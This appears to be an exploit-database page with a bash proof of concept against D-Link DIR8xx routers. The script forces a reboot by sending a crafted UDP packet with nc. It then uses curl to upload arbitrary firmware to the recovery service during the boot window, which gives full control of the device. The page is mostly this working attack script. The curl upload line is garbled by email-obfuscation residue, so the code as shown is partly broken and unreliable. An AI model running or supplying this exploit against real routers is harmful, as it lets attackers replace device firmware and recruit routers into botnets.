D-Link DIR8xx Routers - Local Firmware Upload

2017-09-12 12:05:11

#!/bin/bash

# If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/update.sh

FIRMWARE="firmware.bin"
IP="192.168.0.1"
while true; do
T=$(($RANDOM + ($RANDOM % 2) * 32768))
STATUS=`wget -t 1 --no-cache -T 0.2 -O - http://$IP/?_=$T 2>/dev/null`
if [[ $STATUS == *"<title>Provided by D-Link</title>"* ]]; then
echo "Uploading..."
curl -F "<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="fb9f9a8f9ac6bb">[email protected]</a>$FIRMWARE" --connect-timeout 99999 -m 99999 --output /dev/null http://$IP/f2.htm
break
elif [[ $STATUS == *"<title>D-LINK</title>"* ]]; then
echo "Rebooting..."
echo -n -e '\x00\x01\x00\x01EXEC REBOOT SYSTEMaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' | timeout 1s nc -u $IP 19541
fi
done<script>!function(e,t,r,n,c,h,o){function a(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return r}try{for(c=e.getElementsByTagName('a'),o='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(h=c[n]).href.indexOf(o))>-1&&(h.href='mailto:'+a(h.href,t+o.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(h=c[n]).parentNode.replaceChild(e.createTextNode(a(h.getAttribute('data-cfemail'),0)),h)}catch(e){}}catch(e){}}(document);</script>

Fixes

No fixes

In order to submit a new fix you need to be registered.